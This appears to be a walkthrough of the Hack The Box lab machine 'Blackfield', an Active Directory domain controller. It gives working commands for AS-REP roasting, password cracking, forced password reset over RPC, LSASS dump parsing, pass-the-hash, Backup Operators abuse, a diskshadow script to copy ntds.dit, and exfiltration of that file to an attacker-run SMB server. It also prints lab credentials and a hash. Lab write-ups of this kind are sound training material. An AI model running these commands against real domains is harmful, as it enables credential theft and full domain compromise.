HTB | Blackfield

This is the Box on Hack The Box Active Directory 101 Track. Find the box here.

Skill Learned

  • Leveraging Backup Operators group membership

  • Dumping credentials from LSASS

  • Exploiting ntds.dit vis diskshadow

NMAP

IP: 10.10.10.192

nmap -sT -p- --min-rate 10000 10.10.10.192 -Pn
nmap -sC -sV -p 53,88,135,389,445,593,3268,5985 10.10.10.192 -Pn
nmap

LDAP - TCP 389

from Nmap result, we know the domain "BLACKFIELD.local0"

ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts

-x - simple auth
-H ldap://10.10.10.192 - host to query
-s base - set the scope to base
namingcontexts - return naming contexts

This gives the domain, BLACKFIELD.LOCAL:

ldapsearch

SMB - TCP 445

CrackMapExec

crackmapexec gives a hostname, DC01, which is in line with the thinking that this was a domain controller. It also gives a domain, BLACKFIELD.local.

crackmapexec smb 10.10.10.192
crackmapexec smb 10.10.10.192

Null Connection With no creds, I can read the profiles$ Share:

smbmap -H 10.10.10.192 -u guest -p ""
smbmap -H 10.10.10.192 -u guest -p ""

I can connect, and there are over 300 directories in the share:

smbclient //10.10.10.192/profiles$ -N
smbclient //10.10.10.192/profiles$ -N

Each directory is empty

I will copy the names to a text file.

HTTP - 5985

page not found

port 5985

Foothold/shell

Access as support

AS-REP Roast

Just like in Forest and Sauna, I can check this list of users for any that have the UF_DONT_REQUIRE_PREAUTH flag set to true. For those users, requesting a Kerberos ticket will generate a hash that I can try to break with brute force without my having any value user credentials on the domain.

I’ll use the list of users I collected from profiles$ share, and run GetNPUsers.py to look for vulnerable users.

GetNPUsers.py 'BLACKFIELD.LOCAL/' -usersfile user.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.192

found the hash for support

Now we can crack the hash

hashcat -m 18200 hashes.aspreroast /home/anurag/Downloads/rockyou.txt --force

With these creds, I’ll see what kind of access I just acquired. Unfoutunately, support does not have WinRM access:

These creds do work for SMB:

crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

But we have READ-ONLY access

smbap via support

Access as audit2020

Kerberoasting

Now that I have valid domain creds, I tried to Kerberoast, but no tickets came back:

GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
GetUserSPNs.py

Bloodhound

There’s a BloodHound injestor that can be run from Linux, BloodHound.py.

bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 -c All

-c ALL - All collection methods 
-u support -p #00^BlackKnight - Username and password to auth as 
-d blackfield.local - domain name 
-dc dc01.blackfield.local - DC name (it won’t let you use an IP here) 
-ns 10.10.10.192 - use 10.10.10.192 as the DNS server
bloodhound.py

It gives 7 JSON files

Load all the files in Bloodhound

In the top left, I searched for support and checked out the node info.

There was one item listed under “First Degree Object Control”:

When I click the “1”, I can see that support has “ForceChangePassword” on AUDIT2020:

Password Reset over RPC

There’s a somewhat famous post by Mubix about resetting Windows passwords over RPC. I’ll use the command setuserinfo2:

The blog says to use 23 as the level.

we can also do this via a single command

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "test@123"'
rpcclient to reset audit2020 password

Now we can login via audit2020 on smb but no Winrm

crackmapexec

Shell as svc_backup

As audit2020, I now have access to a new share that wasn’t even listed before, forensic:

Connecting to forensic, there are three folders:

This appears to be the results of an investigation. commands_output has a bunch of text files:

There’s an extra account, Ipwn3dYourCompany, in domain_admins.txt:

In memory_analysis we found alot of zip files

Extract Hashes

Immediately I’m drawn to lsass.zip. Mimikatz first came to prominence because it would dump plaintext credentials and hashes from lsass.exe As anti-virus started catching on to that, attackers pivoted. A well-known technique is to use procdump.exe from Sysinternals to dump lsass.exe and then exfil that memory dump and extract hashes from it in the attacker-controlled space.

on downloading the file via smbclient it gave the error NT_STATUS_IO_TIMEOUT

so I tried the smbclient.py utility of impacket

smbclient.py audit2020:'test@123'@10.10.10.192
smbclient.py audit2020:'test@123'@10.10.10.192

I’ll unzip lsass.zip and it gives a 137MB Mini Dump, which is the memory from the process at the time of capture:

After unzipping lsass.zip we can use Pypykatz on the extracted lsass.DMP file to retrieve NT hashes.

pip3 install pypykatz 
pypykatz lsa minidump lsass.DMP

we found some interesting sessions

svc_backup

svc_backup

Administrator

Before spraying these credentials against the server, let's check the account lockout policy.

ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local" -D 'BLACKFIELD\support' -w '#00^BlackKnight' -s sub "*" | grep lockoutThreshold

The password policy has a lockoutThreshold of 0, which means we can attempt an unlimited number of passwords without locking the account out (although this is quite noisy). We can extract all usernames and hashes from the lsass dump and save them as hashes and users respectively, and spray with CrackMapExec in order to discover a combination.

pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{ print $2 }' | sort -u > hashes 
pypykatz lsa minidump lsass.DMP | grep 'Username:' | awk '{ print $2 }' | sort -u > users

For some reason, I am unable to pass the users and hashes file for spraying. I will be passing the username for the hashes file

we found a hash for svc_backup

on trying winrm we get Pwn3d!

we are in via evil-winrm and found user.txt

evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
user.txt

Priv Esc

If the account name didn’t give it away, checking whoami /priv shows that this account has a really powerful privilege:

whoami /priv

SeBackUpPrivilege basically allows for a full system read. This is because svc_backup is in the Backup Operators group:

net user svc_backup

Backup Operators is a default Windows group that is designed to backup and restore files on the computer using certain methods to read and write all (or most) files on the system. This repo has a nice set of PowerShell tools for abusing the SeBackupPrivilege. I’ll clone it, and then I’ll need to upload two files to Blackfields:

Now I’ll import them into my current session:

Now I can read files across the filesystem. For example, I can’t read C:\windows\system32\config\netlogon.dns as a non-admin user:

But I can copy it and read it:

Unfortunately, for some reason, I can’t read root.txt:

The next file I wanted to grab was ntds.dit, the database on the DC that holds all the password hashes. Unfortunately, I can’t grab it because it’s in use:

DiskShadow A good way to read the ntds.dit file is using another Microsoft utility, diskshadow Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). By default, Diskshadow uses an interactive command interpreter similar to that of Diskraid or Diskpart. Diskshadow also includes a scriptable mode. Because my shell is not an interactive desktop, I’ll want to use the scripting mode. It involves just putting diskshadow commands in a file, one per line. Pentestlab Blog has a good breakdown that includes a section on using diskshadow. It’s written as if you have admin and just have to deal with accessing the file, so my strategy will be slightly different. I’m going to create a file that mounts the C drive as another drive using the VSS. I’ll be able to read files from there that would be locked in c.

It took me a few attempts to get this to actually work. Refer this script from the PentestLab blog

In summary, to get this script working, I needed to

  • Make sure the input script file uses Windows line endings. If I write the script file on Kali, I’ll need to use unix2dos on it before uploading.

  • Set the metadata path to something writable, or run from a directory I can write to or set the metadata path.

  • Some quick testing shows it is fine to run from outside system32 despite what the blog post said.

The working script:

set context persistent nowriters
set metadata c:\programdata\at.cab
set verbose on
add volume c: alias at
create
expose %at% z:

Script to clean up after we are done:

set context persistent nowriters
set metadata c:\programdata\at.cab
set verbose on
delete shadows volume at
reset
vss,dsh

I’ll upload that and run it. The article recommended running out of C:\windows\system32:

Grab ntds.dit I’ll start an SMB server locally on my host so that I can copy the ntds.dit file directly there with

smbserver.py share . -smb2support -username anurag -password anurag

Now I can auth to the share:

Now, after running the script to expose the shadow copy, I’ll copy ntds.dit to the share:

It takes a minute, but it succeeds.

To get hashes out of this, I’ll also need the keys from the SYSTEM registry file. I’ll save it with reg:

Dump Hashes Now I can use these two files to dump hashes for the full domain using secretsdump.py:

Now we have the administrator hash we can use evil-winrm to get the shell and found root.txt

PreviousHTB | ActiveNextHTB | Resolute

Last updated